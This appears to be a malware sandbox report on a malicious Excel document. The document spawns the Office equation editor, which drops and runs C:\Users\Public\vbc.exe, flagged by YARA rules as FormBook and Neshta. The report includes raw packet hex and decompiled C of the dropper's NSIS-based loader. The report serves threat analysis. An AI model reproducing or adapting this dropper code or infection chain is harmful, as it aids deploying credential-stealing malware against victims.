            Sep 27, 2021 21:08:39.688507080 CEST3INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 8b 0d 28 ec 42 00 89 48 04 50 ff 75 10 ff 75 0c ff 75 08 ff 15 f4 71 40 00 e9 42 01 00 00 53 56 8b 35 30 ec 42 00 8d 45 a4
            Data Ascii: U\}t+}FEuH(BHPuuuq@BSV50BEWPuq@eEEPuq@}ePp@FRVVU+MM3FQNUMVTUFPEEPMXp@EEPEPu
            Sep 27, 2021 21:08:39.688529968 CEST4INData Raw: e0 ec 42 00 89 88 a0 ec 42 00 e9 85 13 00 00 8b 45 e0 8d 34 85 a0 ec 42 00 33 c0 8b 0e 3b cb 0f 94 c0 23 4d e4 8b 44 85 d8 89 0e e9 6f 13 00 00 ff 34 95 a0 ec 42 00 56 e9 ff 12 00 00 8b 0d f0 e3 42 00 8b 35 5c 72 40 00 3b cb 74 07 52 51 ff d6 8b
            Data Ascii: BBE4B3;#MDo4BVB5\r@;tRQEB;2PQ)juP|p@joWA;tTj\VA:Eu9]t(>tW=W=;t=uWxp@uEEF:u9
            Sep 27, 2021 21:08:39.688555002 CEST6INData Raw: 45 e4 e9 5e 0e 00 00 76 86 8b 45 e8 e9 54 0e 00 00 6a 01 e8 90 0f 00 00 6a 02 8b f8 e8 87 0f 00 00 8b c8 8b 45 e4 83 f8 0c 77 6d ff 24 85 d8 29 40 00 03 f9 eb 62 2b f9 eb 5e 0f af cf 8b f9 eb 57 3b cb 74 42 8b c7 99 f7 f9 8b f8 eb 4a 0b f9 eb 46
            Data Ascii: E^vETjjEwm$)@b+^W;tBJF#B3>3;;u3+;t;t3G;t3EW_j jPWV4r@E=@@;tDH;?;u;@@WVq@
            Sep 27, 2021 21:08:39.809499979 CEST7INData Raw: 01 8b f0 e8 83 0a 00 00 39 5d e8 89 45 08 74 0d 56 ff 15 44 71 40 00 8b f8 3b fb 75 10 6a 08 53 56 ff 15 40 71 40 00 8b f8 3b fb 74 7a ff 75 08 57 ff 15 10 71 40 00 8b f0 3b f3 74 3d 39 5d e0 89 5d fc 74 17 ff 75 e0 e8 38 f4 ff ff ff d6 85 c0 74
            Data Ascii: 9]EtVDq@;ujSV@q@;tzuWq@;t=9]]tu8t1E(h@h@@hBhuuj.9]WWHq@yjKjDjjEjjEjEEVE6uj!
            Sep 27, 2021 21:08:39.809525013 CEST8INData Raw: e0 ff 75 dc 50 e8 bc 33 00 00 83 f8 ff 0f 84 a2 01 00 00 50 e9 70 f0 ff ff 39 5d e0 74 11 6a 01 e8 0f 05 00 00 a2 40 a0 40 00 33 c0 40 eb 0d 6a 11 e8 1b 05 00 00 50 e8 c9 36 00 00 38 1e 0f 84 73 01 00 00 8d 4d 08 53 51 50 68 40 a0 40 00 56 e8 11
            Data Ascii: uP3Pp9]tj@@3@jP68sMSQPh@@V6P4q@mj]Eo;~M8V]59]E~}uESPEjPu$q@te}u_9]u!}t+}t%E>F:Et@;u|9EPW_5
            Sep 27, 2021 21:08:39.809588909 CEST10INData Raw: 38 9c 40 00 ff 34 81 6a 00 e8 c9 31 00 00 50 e8 18 31 00 00 c2 04 00 56 8b 74 24 08 85 f6 57 8b c6 7d 02 f7 d8 8b 15 38 9c 40 00 8b c8 83 e1 0f c1 f8 04 ff 34 8a c1 e0 0a 05 40 9c 40 00 50 e8 93 31 00 00 85 f6 8b f8 7d 06 57 e8 c7 33 00 00 8b c7
            Data Ascii: 8@4j1P1Vt$W}8@4@@P1}W3_^USVEWPB3PSuup@;ui5$p@9]uKSPuuWPSutup@j{4;t$S5Buuup@3@_^[9
            Sep 27, 2021 21:08:39.809607029 CEST11INData Raw: 48 4c 41 00 56 57 e8 59 01 00 00 85 c0 0f 84 fc 00 00 00 29 75 14 89 3d 80 b0 40 00 89 35 84 b0 40 00 8b 7d f4 8b 45 f8 68 80 b0 40 00 89 3d 88 b0 40 00 a3 8c b0 40 00 e8 ab 30 00 00 85 c0 89 45 e8 0f 8c a8 00 00 00 8b 35 88 b0 40 00 2b f7 ff d3
            Data Ascii: HLAVWY)u=@5@}Eh@=@@0E5@+BtC+E=w}u3Eu+EjdP8q@PEh @P4r@EPj}3;t?9Eu PEPVuu4q@t39uu.u@u)uE}?u9Ejj
            Sep 27, 2021 21:08:39.809647083 CEST13INData Raw: 1d b4 ec 42 00 0f 84 97 00 00 00 6a 05 e8 bf 2a 00 00 6a 06 8b e8 e8 b6 2a 00 00 6a 07 8b f0 e8 ad 2a 00 00 3b eb 8b f8 74 48 3b f3 74 44 3b fb 74 40 8d 44 24 20 50 6a 28 ff 15 90 70 40 00 50 ff d5 85 c0 74 2c 8d 44 24 28 50 68 2c 91 40 00 53 ff
            Data Ascii: Bj*j*j*;tH;tD;t@D$ Pj(p@Pt,D$(Ph,@SSSD$,SPSt$4D$<D$HjX*;tVj%SSStVjr@ujBtD$t$p@@tPp@@(jhXCV5\Bt$V
            Sep 27, 2021 21:08:39.809936047 CEST14INData Raw: f8 05 0f 87 8e 00 00 00 6a eb ff 75 10 ff 15 b4 71 40 00 8b f0 85 f6 74 7d f6 46 14 02 8b 06 57 8b 3d 88 71 40 00 74 03 50 ff d7 f6 46 14 01 74 0a 50 ff 75 0c ff 15 4c 70 40 00 ff 76 10 ff 75 0c ff 15 44 70 40 00 8b 46 04 f6 46 14 08 89 45 f8 74
            Data Ascii: juq@t}FW=q@tPFtPuLp@vuDp@FFEtPEF_tPu\p@Ft!FEFtPPp@EPXp@FF3^UEdBuQup@u#MdB3]U}SVW]{0}
            Sep 27, 2021 21:08:39.930754900 CEST15INData Raw: 00 00 8b 45 e4 8d 50 08 89 55 ec 8d 42 10 80 38 00 0f 84 90 00 00 00 89 45 c8 8b 02 6a 20 8b d0 59 89 5d b0 23 d1 c7 45 b4 02 00 ff ff a8 02 c7 45 b8 0d 00 00 00 89 4d c4 89 7d dc 89 55 c0 74 38 8d 45 b0 c7 45 b8 4d 00 00 00 50 6a 00 68 00 11 00
            Data Ascii: EPUB8Ej Y]#EEM}Ut8EEMPjhEuBEB.tSjhuEPjhuBUG;=LBUK}ujuq@$Pju(r@}uju\r@u


            Code Manipulations

            Statistics

            CPU Usage

            Click to jump to process

            Memory Usage

            Click to jump to process

            High Level Behavior Distribution

            Click to dive into process behavior distribution

            Behavior

            Click to jump to process

            System Behavior

            Analysis Process: EXCEL.EXE PID: 2428 Parent PID: 596

            General

            Start time:21:08:18
            Start date:27/09/2021
            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            Wow64 process (32bit):false
            Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
            Imagebase:0x13f170000
            File size:28253536 bytes
            MD5 hash:D53B85E21886D2AF9815C377537BCAC3
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate

            Chronological Activities

            Analysis Process: EQNEDT32.EXE PID: 2760 Parent PID: 596

            General

            Start time:21:08:38
            Start date:27/09/2021
            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            Wow64 process (32bit):true
            Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Imagebase:0x400000
            File size:543304 bytes
            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            Chronological Activities

            Analysis Process: vbc.exe PID: 1612 Parent PID: 2760

            General

            Start time:21:08:43
            Start date:27/09/2021
            Path:C:\Users\Public\vbc.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\Public\vbc.exe'
            Imagebase:0x400000
            File size:288145 bytes
            MD5 hash:A9DCC61F31601E771050463C4D41CDB0
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: 00000004.00000002.469258298.0000000002770000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
            Antivirus matches:
            • Detection: 100%, Joe Sandbox ML
            • Detection: 42%, Virustotal, Browse
            • Detection: 20%, ReversingLabs
            Reputation:low

            Chronological Activities

            Analysis Process: vbc.exe PID: 2248 Parent PID: 1612

            General

            Start time:21:08:44
            Start date:27/09/2021
            Path:C:\Users\Public\vbc.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\Public\vbc.exe'
            Imagebase:0x400000
            File size:288145 bytes
            MD5 hash:A9DCC61F31601E771050463C4D41CDB0
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: 00000005.00000000.466845988.00000000001C0000.00000040.00000001.sdmp, Author: Florian Roth
            Reputation:low

            Chronological Activities

            Disassembly

            Code Analysis

            Reset < >

              Analysis Process: vbc.exe PID: 1612 Parent PID: 2760 vbc.exeCOMMON

              Executed Functions

              Function 0040312A, Relevance: 82.6, APIs: 26, Strings: 21, Instructions: 315stringfilecomCOMMON
              Download Yara Rule
              C-Code - Quality: 78%
              			_entry_() {
				intOrPtr _t47;
				CHAR* _t51;
				char* _t54;
				CHAR* _t56;
				void* _t60;
				intOrPtr _t62;
				int _t64;
				char* _t67;
				char* _t68;
				int _t69;
				char* _t71;
				char* _t74;
				intOrPtr _t87;
				int _t91;
				intOrPtr _t93;
				void* _t95;
				void* _t107;
				intOrPtr* _t108;
				char _t111;
				CHAR* _t116;
				char* _t117;
				CHAR* _t118;
				char* _t119;
				void* _t121;
				char* _t123;
				char* _t125;
				char* _t126;
				void* _t128;
				void* _t129;
				intOrPtr _t138;
				char _t147;

				 *(_t129 + 0x20) = 0;
				 *((intOrPtr*)(_t129 + 0x14)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t129 + 0x1c) = 0;
				 *(_t129 + 0x18) = 0x20;
				SetErrorMode(0x8001); // executed
				if(GetVersion() != 6) {
					_t108 = E00405F57(0);
					if(_t108 != 0) {
						 *_t108(0xc00);
					}
				}
				_t118 = "UXTHEME";
				goto L4;
				while(1) {
					L22:
					_t111 =  *_t56;
					_t134 = _t111;
					if(_t111 == 0) {
						break;
					}
					__eflags = _t111 - 0x20;
					if(_t111 != 0x20) {
						L10:
						__eflags =  *_t56 - 0x22;
						 *((char*)(_t129 + 0x14)) = 0x20;
						if( *_t56 == 0x22) {
							_t56 =  &(_t56[1]);
							__eflags = _t56;
							 *((char*)(_t129 + 0x14)) = 0x22;
						}
						__eflags =  *_t56 - 0x2f;
						if( *_t56 != 0x2f) {
							L20:
							_t56 = E004056E5(_t56,  *((intOrPtr*)(_t129 + 0x14)));
							__eflags =  *_t56 - 0x22;
							if(__eflags == 0) {
								_t56 =  &(_t56[1]);
								__eflags = _t56;
							}
							continue;
						} else {
							_t56 =  &(_t56[1]);
							__eflags =  *_t56 - 0x53;
							if( *_t56 == 0x53) {
								__eflags = (_t56[1] | 0x00000020) - 0x20;
								if((_t56[1] | 0x00000020) == 0x20) {
									_t14 = _t129 + 0x18;
									 *_t14 =  *(_t129 + 0x18) | 0x00000002;
									__eflags =  *_t14;
								}
							}
							__eflags =  *_t56 - 0x4352434e;
							if( *_t56 == 0x4352434e) {
								__eflags = (_t56[4] | 0x00000020) - 0x20;
								if((_t56[4] | 0x00000020) == 0x20) {
									_t17 = _t129 + 0x18;
									 *_t17 =  *(_t129 + 0x18) | 0x00000004;
									__eflags =  *_t17;
								}
							}
							__eflags =  *((intOrPtr*)(_t56 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t56 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t56 - 2)) = 0;
								_t57 =  &(_t56[2]);
								__eflags =  &(_t56[2]);
								E00405BC7("C:\\Users\\Albus\\AppData\\Local\\Temp", _t57);
								L25:
								_t116 = "C:\\Users\\Albus\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t116); // executed
								_t60 = E004030F9(_t134);
								_t135 = _t60;
								if(_t60 != 0) {
									L27:
									DeleteFileA("1033"); // executed
									_t62 = E00402C55(_t136,  *(_t129 + 0x18)); // executed
									 *((intOrPtr*)(_t129 + 0x10)) = _t62;
									if(_t62 != 0) {
										L37:
										E00403540();
										__imp__OleUninitialize();
										_t143 =  *((intOrPtr*)(_t129 + 0x10));
										if( *((intOrPtr*)(_t129 + 0x10)) == 0) {
											__eflags =  *0x42ecb4; // 0x0
											if(__eflags == 0) {
												L64:
												_t64 =  *0x42eccc; // 0xffffffff
												__eflags = _t64 - 0xffffffff;
												if(_t64 != 0xffffffff) {
													 *(_t129 + 0x1c) = _t64;
												}
												ExitProcess( *(_t129 + 0x1c));
											}
											_t126 = E00405F57(5);
											_t119 = E00405F57(6);
											_t67 = E00405F57(7);
											__eflags = _t126;
											_t117 = _t67;
											if(_t126 != 0) {
												__eflags = _t119;
												if(_t119 != 0) {
													__eflags = _t117;
													if(_t117 != 0) {
														_t74 =  *_t126(GetCurrentProcess(), 0x28, _t129 + 0x20);
														__eflags = _t74;
														if(_t74 != 0) {
															 *_t119(0, "SeShutdownPrivilege", _t129 + 0x28);
															 *(_t129 + 0x3c) = 1;
															 *(_t129 + 0x48) = 2;
															 *_t117( *((intOrPtr*)(_t129 + 0x34)), 0, _t129 + 0x2c, 0, 0, 0);
														}
													}
												}
											}
											_t68 = E00405F57(8);
											__eflags = _t68;
											if(_t68 == 0) {
												L62:
												_t69 = ExitWindowsEx(2, 0x80040002);
												__eflags = _t69;
												if(_t69 != 0) {
													goto L64;
												}
												goto L63;
											} else {
												_t71 =  *_t68(0, 0, 0, 0x25, 0x80040002);
												__eflags = _t71;
												if(_t71 == 0) {
													L63:
													E0040140B(9);
													goto L64;
												}
												goto L62;
											}
										}
										E00405488( *((intOrPtr*)(_t129 + 0x14)), 0x200010);
										ExitProcess(2);
									}
									_t138 =  *0x42ec3c; // 0x0
									if(_t138 == 0) {
										L36:
										 *0x42eccc =  *0x42eccc | 0xffffffff;
										 *(_t129 + 0x1c) = E0040361A( *0x42eccc);
										goto L37;
									}
									_t123 = E004056E5(_t125, 0);
									while(_t123 >= _t125) {
										__eflags =  *_t123 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t123 = _t123 - 1;
										__eflags = _t123;
									}
									_t140 = _t123 - _t125;
									 *((intOrPtr*)(_t129 + 0x10)) = "Error launching installer";
									if(_t123 < _t125) {
										_t121 = E0040540F(_t143);
										lstrcatA(_t116, "~nsu");
										if(_t121 != 0) {
											lstrcatA(_t116, "A");
										}
										lstrcatA(_t116, ".tmp");
										_t127 = "C:\\Users\\Public";
										if(lstrcmpiA(_t116, "C:\\Users\\Public") != 0) {
											_push(_t116);
											if(_t121 == 0) {
												E004053F2();
											} else {
												E00405375();
											}
											SetCurrentDirectoryA(_t116);
											_t147 = "C:\\Users\\Albus\\AppData\\Local\\Temp"; // 0x43
											if(_t147 == 0) {
												E00405BC7("C:\\Users\\Albus\\AppData\\Local\\Temp", _t127);
											}
											E00405BC7(0x42f000,  *(_t129 + 0x20));
											 *0x42f400 = 0x41;
											_t128 = 0x1a;
											do {
												_t87 =  *0x42ec30; // 0x504d60
												E00405BE9(0, _t116, 0x428c58, 0x428c58,  *((intOrPtr*)(_t87 + 0x120)));
												DeleteFileA(0x428c58);
												if( *((intOrPtr*)(_t129 + 0x10)) != 0) {
													_t91 = CopyFileA("C:\\Users\\Public\\vbc.exe", 0x428c58, 1);
													_t149 = _t91;
													if(_t91 != 0) {
														_push(0);
														_push(0x428c58);
														E00405915(_t149);
														_t93 =  *0x42ec30; // 0x504d60
														E00405BE9(0, _t116, 0x428c58, 0x428c58,  *((intOrPtr*)(_t93 + 0x124)));
														_t95 = E00405427(0x428c58);
														if(_t95 != 0) {
															CloseHandle(_t95);
															 *((intOrPtr*)(_t129 + 0x10)) = 0;
														}
													}
												}
												 *0x42f400 =  *0x42f400 + 1;
												_t128 = _t128 - 1;
												_t151 = _t128;
											} while (_t128 != 0);
											_push(0);
											_push(_t116);
											E00405915(_t151);
										}
										goto L37;
									}
									 *_t123 = 0;
									_t124 =  &(_t123[4]);
									if(E0040579B(_t140,  &(_t123[4])) == 0) {
										goto L37;
									}
									E00405BC7("C:\\Users\\Albus\\AppData\\Local\\Temp", _t124);
									E00405BC7("C:\\Users\\Albus\\AppData\\Local\\Temp", _t124);
									 *((intOrPtr*)(_t129 + 0x10)) = 0;
									goto L36;
								}
								GetWindowsDirectoryA(_t116, 0x3fb);
								lstrcatA(_t116, "\\Temp");
								_t107 = E004030F9(_t135);
								_t136 = _t107;
								if(_t107 == 0) {
									goto L37;
								}
								goto L27;
							} else {
								goto L20;
							}
						}
					} else {
						goto L9;
					}
					do {
						L9:
						_t56 =  &(_t56[1]);
						__eflags =  *_t56 - 0x20;
					} while ( *_t56 == 0x20);
					goto L10;
				}
				goto L25;
				L4:
				E00405EE9(_t118); // executed
				_t118 =  &(_t118[lstrlenA(_t118) + 1]);
				if( *_t118 != 0) {
					goto L4;
				} else {
					E00405F57(0xd);
					_t47 = E00405F57(0xb);
					 *0x42ec24 = _t47;
					__imp__#17();
					__imp__OleInitialize(0); // executed
					 *0x42ecd8 = _t47;
					SHGetFileInfoA(0x429058, 0, _t129 + 0x38, 0x160, 0); // executed
					E00405BC7("qghopzytl Setup", "NSIS Error");
					_t51 = GetCommandLineA();
					_t125 = "\"C:\\Users\\Public\\vbc.exe\" ";
					E00405BC7(_t125, _t51);
					 *0x42ec20 = GetModuleHandleA(0);
					_t54 = _t125;
					if("\"C:\\Users\\Public\\vbc.exe\" " == 0x22) {
						 *((char*)(_t129 + 0x14)) = 0x22;
						_t54 =  &M00434001;
					}
					_t56 = CharNextA(E004056E5(_t54,  *((intOrPtr*)(_t129 + 0x14))));
					 *(_t129 + 0x20) = _t56;
					goto L22;
				}
			}


































              0x0040313b
              0x0040313f
              0x00403147
              0x0040314b
              0x00403150
              0x00403160
              0x00403163
              0x0040316a
              0x00403171
              0x00403171
              0x0040316a
              0x00403173
              0x00403173
              0x00403289
              0x00403289
              0x00403289
              0x0040328b
              0x0040328d
              0x00000000
              0x00000000
              0x00403222
              0x00403225
              0x0040322d
              0x0040322d
              0x00403230
              0x00403235
              0x00403237
              0x00403237
              0x00403238
              0x00403238
              0x0040323d
              0x00403240
              0x00403279
              0x0040327e
              0x00403283
              0x00403286
              0x00403288
              0x00403288
              0x00403288
              0x00000000
              0x00403242
              0x00403242
              0x00403243
              0x00403246
              0x0040324e
              0x00403251
              0x00403253
              0x00403253
              0x00403253
              0x00403253
              0x00403251
              0x00403258
              0x0040325e
              0x00403266
              0x00403269
              0x0040326b
              0x0040326b
              0x0040326b
              0x0040326b
              0x00403269
              0x00403270
              0x00403277
              0x00403291
              0x00403294
              0x00403294
              0x0040329d
              0x004032a2
              0x004032a2
              0x004032ad
              0x004032b3
              0x004032b8
              0x004032ba
              0x004032e0
              0x004032e5
              0x004032ef
              0x004032f6
              0x004032fa
              0x00403361
              0x00403361
              0x00403366
              0x0040336c
              0x00403370
              0x00403485
              0x0040348b
              0x00403528
              0x00403528
              0x0040352d
              0x00403530
              0x00403532
              0x00403532
              0x0040353a
              0x0040353a
              0x0040349a
              0x004034a3
              0x004034a5
              0x004034aa
              0x004034ac
              0x004034ae
              0x004034b0
              0x004034b2
              0x004034b4
              0x004034b6
              0x004034c6
              0x004034c8
              0x004034ca
              0x004034d7
              0x004034e6
              0x004034ee
              0x004034f6
              0x004034f6
              0x004034ca
              0x004034b6
              0x004034b2
              0x004034fa
              0x004034ff
              0x00403506
              0x00403514
              0x00403517
              0x0040351d
              0x0040351f
              0x00000000
              0x00000000
              0x00000000
              0x00403508
              0x0040350e
              0x00403510
              0x00403512
              0x00403521
              0x00403523
              0x00000000
              0x00403523
              0x00000000
              0x00403512
              0x00403506
              0x0040337f
              0x00403386
              0x00403386
              0x004032fc
              0x00403302
              0x00403351
              0x00403351
              0x0040335d
              0x00000000
              0x0040335d
              0x0040330b
              0x00403318
              0x0040330f
              0x00403315
              0x00000000
              0x00000000
              0x00403317
              0x00403317
              0x00403317
              0x0040331c
              0x0040331e
              0x00403326
              0x00403397
              0x00403399
              0x004033a0
              0x004033a8
              0x004033a8
              0x004033b3
              0x004033b8
              0x004033c7
              0x004033cb
              0x004033cc
              0x004033d5
              0x004033ce
              0x004033ce
              0x004033ce
              0x004033db
              0x004033e1
              0x004033e7
              0x004033ef
              0x004033ef
              0x004033fd
              0x00403404
              0x0040340d
              0x00403413
              0x00403413
              0x0040341f
              0x00403425
              0x0040342f
              0x00403439
              0x0040343f
              0x00403441
              0x00403443
              0x00403444
              0x00403445
              0x0040344a
              0x00403456
              0x0040345c
              0x00403463
              0x00403466
              0x0040346c
              0x0040346c
              0x00403463
              0x00403441
              0x00403470
              0x00403476
              0x00403476
              0x00403476
              0x00403479
              0x0040347a
              0x0040347b
              0x0040347b
              0x00000000
              0x004033c7
              0x00403328
              0x0040332a
              0x00403335
              0x00000000
              0x00000000
              0x0040333d
              0x00403348
              0x0040334d
              0x00000000
              0x0040334d
              0x004032c2
              0x004032ce
              0x004032d3
              0x004032d8
              0x004032da
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00403277
              0x00000000
              0x00000000
              0x00000000
              0x00403227
              0x00403227
              0x00403227
              0x00403228
              0x00403228
              0x00000000
              0x00403227
              0x00000000
              0x00403178
              0x00403179
              0x00403185
              0x0040318b
              0x00000000
              0x0040318d
              0x0040318f
              0x00403196
              0x0040319b
              0x004031a0
              0x004031a7
              0x004031ad
              0x004031c3
              0x004031d3
              0x004031d8
              0x004031de
              0x004031e5
              0x004031f8
              0x004031fd
              0x004031ff
              0x00403201
              0x00403206
              0x00403206
              0x00403216
              0x0040321c
              0x00000000
              0x0040321c

              APIs
              • SetErrorMode.KERNELBASE ref: 00403150
              • GetVersion.KERNEL32 ref: 00403156
              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040317F
              • #17.COMCTL32(0000000B,0000000D), ref: 004031A0
              • OleInitialize.OLE32(00000000), ref: 004031A7
              • SHGetFileInfoA.SHELL32(00429058,00000000,?,00000160,00000000), ref: 004031C3
              • GetCommandLineA.KERNEL32(qghopzytl Setup,NSIS Error), ref: 004031D8
              • GetModuleHandleA.KERNEL32(00000000,"C:\Users\Public\vbc.exe" ,00000000), ref: 004031EB
              • CharNextA.USER32(00000000), ref: 00403216
              • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004032AD
              • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004032C2
              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032CE
              • DeleteFileA.KERNELBASE(1033), ref: 004032E5
                • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?,?,?,00403194,0000000D), ref: 00405F84
              • OleUninitialize.OLE32 ref: 00403366
              • ExitProcess.KERNEL32 ref: 00403386
              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\Public\vbc.exe" ,00000000,00000020), ref: 00403399
              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00409148,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\Public\vbc.exe" ,00000000,00000020), ref: 004033A8
              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\Public\vbc.exe" ,00000000,00000020), ref: 004033B3
              • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\Public,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\Public\vbc.exe" ,00000000,00000020), ref: 004033BF
              • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004033DB
              • DeleteFileA.KERNEL32(00428C58,00428C58,?,0042F000,?), ref: 00403425
              • CopyFileA.KERNEL32 ref: 00403439
              • CloseHandle.KERNEL32(00000000), ref: 00403466
              • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 004034BF
              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403517
              • ExitProcess.KERNEL32 ref: 0040353A
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Filelstrcat$ExitHandleProcess$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpilstrlen
              • String ID: $ /D=$ _?=$"$"C:\Users\Public\vbc.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\Public$C:\Users\Public\vbc.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$UXTHEME$\Temp$`MP$qghopzytl Setup$~nsu
              • API String ID: 3469842172-3566527386
              • Opcode ID: c827ac6488386cdb1cf1d6f25d9587759d491db5d28cf5fcf0659e8390b07969
              • Instruction ID: d16e5acc50ad9605a1934e3a6ea537af925639c8ce6f3cfaab4d64070601e644
              • Opcode Fuzzy Hash: c827ac6488386cdb1cf1d6f25d9587759d491db5d28cf5fcf0659e8390b07969
              • Instruction Fuzzy Hash: ACA1E570908341AED7217F729C4AB2B7EACEB45309F04483FF540B61D2CB7CA9458A6E
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004054EC, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156filestringCOMMON
              Download Yara Rule
              C-Code - Quality: 98%
              			E004054EC(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E0040579B(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x42eca8 =  *0x42eca8 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405BC7(0x42b0a8, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E00405701(_t72);
					} else {
						lstrcatA(0x42b0a8, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x42b0a8,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E004056E5( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405BC7(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E0040587F(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404EB3(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x42eca8 =  *0x42eca8 + 1;
										} else {
											E00404EB3(0xfffffff1, _t72);
											E00405915(__eflags, _t72, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004054EC(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
